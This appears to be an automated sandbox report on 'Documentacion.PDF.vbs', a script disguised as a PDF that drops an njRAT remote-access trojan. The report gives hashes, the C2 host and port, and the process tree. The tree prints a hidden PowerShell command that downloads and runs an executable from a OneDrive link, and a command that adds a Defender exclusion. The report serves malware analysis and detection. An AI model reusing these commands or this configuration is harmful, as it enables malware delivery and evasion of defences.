Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en -
submitted
15-09-2021 12:46
Static task
static1
Behavioral task
behavioral1
Sample
Documentacion.PDF.vbs
Resource
win7v20210408
General
-
Target
Documentacion.PDF.vbs
-
Size
162KB
-
MD5
16dd6afc5e63f4edc4f35fd1176e63bd
-
SHA1
d64a9461b703119695e76f880832924d487a648a
-
SHA256
c34173dfa5a1a842bb14ef1fddd8f15b0998577740469b6987d138e165786994
-
SHA512
3e2abe804b90ec51e1a7fb4145a0b11304e3d279c13cc3f65380721c079fb1b9711bb491e92b5e95c6ca957aeb7bfed9b33b030c094a1dcc3d4ebcab577b8df3
Malware Config
Extracted
https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21152&authkey=AP1AB-SxiNqVg04
Extracted
njrat
0.7NC
NYAN CAT
pedrobedoya2021.duckdns.org:1980
cf13c225ff474d45b
-
reg_key
cf13c225ff474d45b
-
splitter
@!#&^%$
Signatures
-
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 7 4736 powershell.exe 9 4736 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
Hostdyn.exeHostdyn.exeHostdyn.exeHostdyn.exepid process 5008 Hostdyn.exe 3376 Hostdyn.exe 3352 Hostdyn.exe 3336 Hostdyn.exe -
Drops startup file 2 IoCs
Processes:
WScript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Documentacion.PDF.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Documentacion.PDF.vbs WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Hostdyn.exedescription pid process target process PID 5008 set thread context of 3336 5008 Hostdyn.exe Hostdyn.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exeHostdyn.exepowershell.exepid process 4736 powershell.exe 4736 powershell.exe 4736 powershell.exe 5008 Hostdyn.exe 5008 Hostdyn.exe 5008 Hostdyn.exe 5008 Hostdyn.exe 2700 powershell.exe 2700 powershell.exe 2700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
powershell.exeHostdyn.exepowershell.exeHostdyn.exedescription pid process Token: SeDebugPrivilege 4736 powershell.exe Token: SeDebugPrivilege 5008 Hostdyn.exe Token: SeDebugPrivilege 2700 powershell.exe Token: SeDebugPrivilege 3336 Hostdyn.exe Token: 33 3336 Hostdyn.exe Token: SeIncBasePriorityPrivilege 3336 Hostdyn.exe Token: 33 3336 Hostdyn.exe Token: SeIncBasePriorityPrivilege 3336 Hostdyn.exe Token: 33 3336 Hostdyn.exe Token: SeIncBasePriorityPrivilege 3336 Hostdyn.exe Token: 33 3336 Hostdyn.exe Token: SeIncBasePriorityPrivilege 3336 Hostdyn.exe Token: 33 3336 Hostdyn.exe Token: SeIncBasePriorityPrivilege 3336 Hostdyn.exe Token: 33 3336 Hostdyn.exe Token: SeIncBasePriorityPrivilege 3336 Hostdyn.exe Token: 33 3336 Hostdyn.exe Token: SeIncBasePriorityPrivilege 3336 Hostdyn.exe Token: 33 3336 Hostdyn.exe Token: SeIncBasePriorityPrivilege 3336 Hostdyn.exe Token: 33 3336 Hostdyn.exe Token: SeIncBasePriorityPrivilege 3336 Hostdyn.exe Token: 33 3336 Hostdyn.exe Token: SeIncBasePriorityPrivilege 3336 Hostdyn.exe Token: 33 3336 Hostdyn.exe Token: SeIncBasePriorityPrivilege 3336 Hostdyn.exe Token: 33 3336 Hostdyn.exe Token: SeIncBasePriorityPrivilege 3336 Hostdyn.exe Token: 33 3336 Hostdyn.exe Token: SeIncBasePriorityPrivilege 3336 Hostdyn.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
WScript.exepowershell.exeHostdyn.exedescription pid process target process PID 4684 wrote to memory of 4736 4684 WScript.exe powershell.exe PID 4684 wrote to memory of 4736 4684 WScript.exe powershell.exe PID 4736 wrote to memory of 5008 4736 powershell.exe Hostdyn.exe PID 4736 wrote to memory of 5008 4736 powershell.exe Hostdyn.exe PID 4736 wrote to memory of 5008 4736 powershell.exe Hostdyn.exe PID 5008 wrote to memory of 2700 5008 Hostdyn.exe powershell.exe PID 5008 wrote to memory of 2700 5008 Hostdyn.exe powershell.exe PID 5008 wrote to memory of 2700 5008 Hostdyn.exe powershell.exe PID 5008 wrote to memory of 3376 5008 Hostdyn.exe Hostdyn.exe PID 5008 wrote to memory of 3376 5008 Hostdyn.exe Hostdyn.exe PID 5008 wrote to memory of 3376 5008 Hostdyn.exe Hostdyn.exe PID 5008 wrote to memory of 3352 5008 Hostdyn.exe Hostdyn.exe PID 5008 wrote to memory of 3352 5008 Hostdyn.exe Hostdyn.exe PID 5008 wrote to memory of 3352 5008 Hostdyn.exe Hostdyn.exe PID 5008 wrote to memory of 3336 5008 Hostdyn.exe Hostdyn.exe PID 5008 wrote to memory of 3336 5008 Hostdyn.exe Hostdyn.exe PID 5008 wrote to memory of 3336 5008 Hostdyn.exe Hostdyn.exe PID 5008 wrote to memory of 3336 5008 Hostdyn.exe Hostdyn.exe PID 5008 wrote to memory of 3336 5008 Hostdyn.exe Hostdyn.exe PID 5008 wrote to memory of 3336 5008 Hostdyn.exe Hostdyn.exe PID 5008 wrote to memory of 3336 5008 Hostdyn.exe Hostdyn.exe PID 5008 wrote to memory of 3336 5008 Hostdyn.exe Hostdyn.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Documentacion.PDF.vbs"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21152&authkey=AP1AB-SxiNqVg04' ) -encoding byte -Path $env:appdata\Hostdyn.exe; Start-Process $env:appdata\Hostdyn.exe"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Users\Admin\AppData\Roaming\Hostdyn.exe"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Users\Admin\AppData\Roaming\Hostdyn.exe"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"4⤵
- Executes dropped EXE
PID:3376
-
-
C:\Users\Admin\AppData\Roaming\Hostdyn.exe"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
C:\Users\Admin\AppData\Roaming\Hostdyn.exe"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"4⤵
- Executes dropped EXE
PID:3352
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
0c2899d7c6746f42d5bbe088c777f94c
SHA1622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1
SHA2565b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458
SHA512ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078
-
MD5
ddcaff8849639da0fcfaaf1f8977baa9
SHA1e3a1b28dfa55ff65161f7aaaff4c265b868c674d
SHA2565dfa5833116f15d0e8114c62902399a1ed0ee01e68e5ab8261b559ffed5380f5
SHA5127e6929ba6f089b693a00abf89853ecff6452b5f9e9ffe8f72ac3cb61c263ab7f0fda0fd76dc4a8d3db0bc66b682afa3a2fe88a666f406e2cc2bddc491db7e4a1
-
MD5
857aff9992a47764185c61da2493c753
SHA16efa34cd3fdb299fcd940c0719d3a172bac83164
SHA256b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155
SHA512fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a
-
MD5
857aff9992a47764185c61da2493c753
SHA16efa34cd3fdb299fcd940c0719d3a172bac83164
SHA256b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155
SHA512fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a
-
MD5
857aff9992a47764185c61da2493c753
SHA16efa34cd3fdb299fcd940c0719d3a172bac83164
SHA256b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155
SHA512fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a
-
MD5
857aff9992a47764185c61da2493c753
SHA16efa34cd3fdb299fcd940c0719d3a172bac83164
SHA256b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155
SHA512fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a
-
MD5
857aff9992a47764185c61da2493c753
SHA16efa34cd3fdb299fcd940c0719d3a172bac83164
SHA256b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155
SHA512fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a